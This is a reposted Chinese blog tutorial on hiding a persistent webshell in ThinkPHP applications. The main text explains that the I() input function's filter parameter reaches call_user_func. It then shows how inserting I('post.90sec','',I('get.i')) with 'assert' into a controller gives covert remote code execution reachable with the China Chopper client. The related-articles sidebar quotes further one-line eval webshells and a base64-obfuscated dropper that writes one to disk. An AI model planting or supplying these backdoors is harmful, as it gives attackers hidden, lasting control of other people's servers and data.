ThinkPHP留后门技巧

最新推荐文章于 2024-04-14 00:09:52 发布
最新推荐文章于 2024-04-14 00:09:52 发布
阅读量334 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/hookjoy/p/4973396.html
版权

原文链接:https://www.leavesongs.com/PENETRATION/thinkphp-callback-backdoor.html

90sec上有人问,我说了还有小白不会用。去年我审计TP的时候留意到的,干脆分析一下代码和操作过程。

    thinkphp的I函数,是其处理输入的函数,一般用法为I('get.id')——从$_GET数组中取出键为id的值,post、cookie类似。

    let me see see I函数的代码:

01function I($name$default ''$filter = null, $datas = null)
02{
03    ...
04 
05    if ('' == $name) {
06        // 获取全部变量
07        $data    $input;
08        $filters = isset($filter) ? $filter : C('DEFAULT_FILTER');
09        if ($filters) {
10            if (is_string($filters)) {
11                $filters explode(','$filters);
12            }
13            foreach ($filters as $filter) {
14                $data = array_map_recursive($filter$data); // 参数过滤
15            }
16        }
17    elseif (isset($input[$name])) {
18        // 取值操作
19        $data    $input[$name];
20        $filters = isset($filter) ? $filter : C('DEFAULT_FILTER');
21        if ($filters) {
22            if (is_string($filters)) {
23                if (0 === strpos($filters'/')) {
24                    if (1 !== preg_match($filters, (string) $data)) {
25                        // 支持正则验证
26                        return isset($default) ? $default : null;
27                    }
28                else {
29                    $filters explode(','$filters);
30                }
31            elseif (is_int($filters)) {
32                $filters array($filters);
33            }
34 
35            if (is_array($filters)) {
36                foreach ($filters as $filter) {
37                    if (function_exists($filter)) {
38                        $data is_array($data) ? array_map_recursive($filter$data) : $filter($data); // 参数过滤
39                    else {
40                        $data = filter_var($datais_int($filter) ? $filter : filter_id($filter));
41                        if (false === $data) {
42                            return isset($default) ? $default : null;
43                        }
44                    }
45                }
46            }
47        }
48    ...
49    return $data;
50}

    I函数的第三个参数是$filter,作用是对变量的过滤。

 

    新版本(3.2.3)中,$filter可以传入两种4种值:

    1.一个过滤函数(字符串)

    2.一些过滤函数组成的字符串,其间用“|”分割

    3.一些过滤函数的字符串组成的数组

    4.以“/”开头的正则表达式

 

    可见代码,若$filter为空的话,其默认值为C('DEFAULT_FILTER')。我们在配置文件中可以看到,DEFAULT_FILTER=htmlspecialchars

    convention_php_—_thinkphp.png

    以上4个情况最后归为两个,1是过滤回调函数,2是过滤的正则。正则部分如下:

1if (0 === strpos($filters'/')) {
2    if (1 !== preg_match($filters, (string) $data)) {
3        // 支持正则验证
4        return isset($default) ? $default : null;
5    }
6}

    如果第0个字符是/,则说明传入的是正则,用preg_match进行匹配验证,不匹配则返回默认值$default。

 

    而回调函数部分,是我们留后门的关键。核心是这一段:

01if (is_array($filters)) {
02    foreach ($filters as $filter) {
03        if (function_exists($filter)) {
04            $data is_array($data) ? array_map_recursive($filter$data) : $filter($data); // 参数过滤
05        else {
06            $data = filter_var($datais_int($filter) ? $filter : filter_id($filter));
07            if (false === $data) {
08                return isset($default) ? $default : null;
09            }
10        }
11    }
12}

    如果函数存在,则直接调用array_map_recursive执行。如果函数不存在,则用php默认的过滤器filter_var进行过滤。

 

    我们跟进array_map_recursive函数:

01function array_map_recursive($filter$data)
02{
03    $result array();
04    foreach ($data as $key => $val) {
05        $result[$key] = is_array($val)
06        ? array_map_recursive($filter$val)
07        : call_user_func($filter$val);
08    }
09    return $result;
10}

    明显是一个递归执行的过程,最后调用的是call_user_func 。

 

    还记得我说过的php回调后门么(https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html),ThinkPHP厚道,居然给我们预置了一个回调后门,让我们可以万分隐蔽的留下webshell。

    所以,我们只需要随意找个controller,在可访问的方法中插入:

1I('post.90sec''', I('get.i'));

    如上,第三个参数就是刚说的$filter,我们只需要把回调后门函数名字(assert)作为第三个参数传入,即可构造一个回调后门。

 

    我就拿thinkphp默认的IndexController下的index方法示例:

    IndexController_class_php_—_thinkphp.png

    如下即可执行任意代码:

    phpinfo__.png

    一个回调后门,菜刀也可以连接。

转载于:https://www.cnblogs.com/hookjoy/p/4973396.html

weixin_34014277
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php如何后门,ThinkPHP后门技巧
weixin_35451402的博客
03-28 1064
欢迎来到阿八个人博客网站。本阿八个人博客网站提供最新的站长新闻,各种互联网资讯。喜欢本站的朋友可以收藏本站,或者加QQ:我们大家一起来交流技术!URL链接:https://www.abboke.com/rz/2019/1010/116721.html90sec上有人问,我说了还有小白不会用。去年我审计TP的时候意到的,干脆分析一下代码和操作过程。thinkphp的I函数,是其处理输入的函数,一般...
thinkphp模板输出技巧汇总
10-25
ThinkPHP是一款广受欢迎的PHP开发框架,其模板引擎提供了丰富的输出技巧,使开发者能更方便地在视图层处理数据并展示给用户。下面将详细解释这些模板输出技巧。 一、变量输出 1. **标量输出**:在ThinkPHP模板中,...
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
10-28
今天一个客户的服务器频繁被写入一句话后门,删除了还有,原来在程序中加入了如下代码,大家可以注意下base64_decode函数的参数。
PHP后门隐藏与维持技巧
weixin_34067980的博客
05-23 225
0×00前言在一个成功的测试后,通常会想让特权保持的更久些.后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普.以PHP-WEBBACKDOOR为例,抛砖引玉一个最常见的一句话后门可能写作这样<?php@eval($_POST['cmd']);?>或这样<?php@asse...
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,网络安全开发工程师面试题
最新发布
2401_83947105的博客
04-14 956
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(
think php 后门,看我如何调查放置后门Thinkphp
weixin_28911479的博客
03-20 457
### 简要描述:提交这个我纠结了很久,本来我是可以做一个坏帽子,贼喊捉贼,昨天晚上想了想,我的偶像猪猪侠提交的那些漏洞和我这比我这就是渣渣,他都可以无私的提交而不去换取不正当的金钱,我为什么就不可以呢?这个应该属于通用漏洞奖励鸟### 详细说明:渗透thinkphp完全是因为无聊之余搞了搞,可是没想到的还搞进去了,呵呵,首先在一个群里面发现别人发了一个thinkphp的连接 打开是一个压缩包 8...
ThinkPHP2.0开发技巧
11-11
ThinkPHP2.0开发技巧》是一份专为开发者准备的深入指南,旨在帮助他们更好地理解和运用ThinkPHP2.0框架进行Web应用开发。ThinkPHP2.0是中国PHP社区非常流行的一个轻量级开发框架,它以其简洁、高效、易用的特点受...
ThinkPHP 2.0开发技巧大全
02-29
ThinkPHP 2.0开发技巧大全》是一个深入解析ThinkPHP 2.0框架的全面教程,旨在帮助开发者掌握该框架的各项核心技术和实用技巧。在本文中,我们将围绕ThinkPHP 2.0的关键特性和开发实践展开讨论,帮助你成为ThinkPHP...
thinkphp配置连接数据库技巧
01-20
本文实例讲述了thinkphp配置连接数据库的常用方法,分享给大家供大家参考。具体方法如下: 1.在thinkphp入口文件同目录下的config.inc.php中添加数据库配置信息 复制代码 代码如下:<?php  return array(  ‘DB_...
php后门隐藏技巧
weixin_34150503的博客
08-25 355
一句话 and 大马phpspy 菜刀一句话<?php@eval($_POST['cmd']);?>反射后门<?php$func = new ReflectionFunction($_GET[m]);echo $func->invokeArgs(array($_GET[c]));?>调用如x.php?m=system&c=...
php怎么cookie后门,ThinkPHP后门技巧
weixin_39679468的博客
03-12 172
原文连接:https://www.leavesongs.com/PENETRATION/thinkphp-callback-backdoor.htmlphp90sec上有人问,我说了还有小白不会用。去年我审计TP的时候意到的,干脆分析一下代码和操做过程。htmlthinkphp的I函数,是其处理输入的函数,通常用法为I('get.id')——从$_GET数组中取出键为id的值,post、cook...
think php 后门,ThinkPHP后门技巧
weixin_29831325的博客
03-20 387
原文链接:https://www.leavesongs.com/PENETRATION/thinkphp-callback-backdoor.html90sec上有人问,我说了还有小白不会用。去年我审计TP的时候意到的,干脆分析一下代码和操作过程。thinkphp的I函数,是其处理输入的函数,一般用法为I(‘get.id‘)——从$_GET数组中取出键为id的值,post、cookie类似。le...
PHP_GET后门,躲避任何安全软件
weixin_30813225的博客
01-23 202
经常拿到一些比较好的php站想要住。插入菜刀一句话,很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。现在教大家一个简单的技巧。本人一直在用,后门没有被删过了。 <?php file_put_contents('xpxp.php',"$_GET[uname]");//此段代码插入它正常的PHP里面,最好插头部。 复制代码利用也很...
PHP隐形一句话后门,和ThinkPHP框架加密码程序
weixin_30721899的博客
09-25 682
服务器自动写入: mm.php 内容为: <?eval($_POST[c]);?> 代码: <?fputs(fopen(base64_decode("bW0ucGhw"),"w"),base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4="));?> base64_decode(...
ThinkPHP通过日志查找后门木马的方法
美奇软件开发工作室
04-21 856
导读: 黑客会在很多开源框架里植入自己的木马或后门,典型的就是eval一句话,如果你使用的是开源程序,或者从别人那里购买回来的程序,一定要认真检查,及时清理掉后门木马,以免网站和服务器被黑客控制,从而造成不必要的损失。作为运维,可以通过查看网站日志查看是否有人尝试入侵,通过日志可以很清晰的了解到黑客的手段,下面分享我是怎么通过日志来查看的,如果发现有人尝试入侵,我会直接屏蔽他的IP,因为我的网站是自己开发的,并没有使用任何开源插件,所以才没有被黑客成功入侵。 一、使用文本替换专家2.5.exe工具,在网
php在服务器上后门,服务器上发现的一段PHP后门程序
weixin_31913479的博客
03-09 208
服务器上发现的一段PHP后门程序error_reporting(0);$path = __DIR__;if ($_GET["login"] == "2M05Wd") {if (isset($_FILES["uploadedfile"])) {$target_path = basename($_FILES["uploadedfile"]["name"]);if (move_uploaded_file...
thinkphp5+远程代码执行_ThinkPHP5.0.x远程命令执行高危漏洞预警
weixin_39777543的博客
11-25 182
漏洞综述关于ThinkPHPThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,其借鉴了国外很多优秀的框架和模式,包括使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式等。该框架常被用来进行二次开发,国内应用非常广泛。漏洞原理Thinkphp处理请求的关键类为Request(thinkph...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值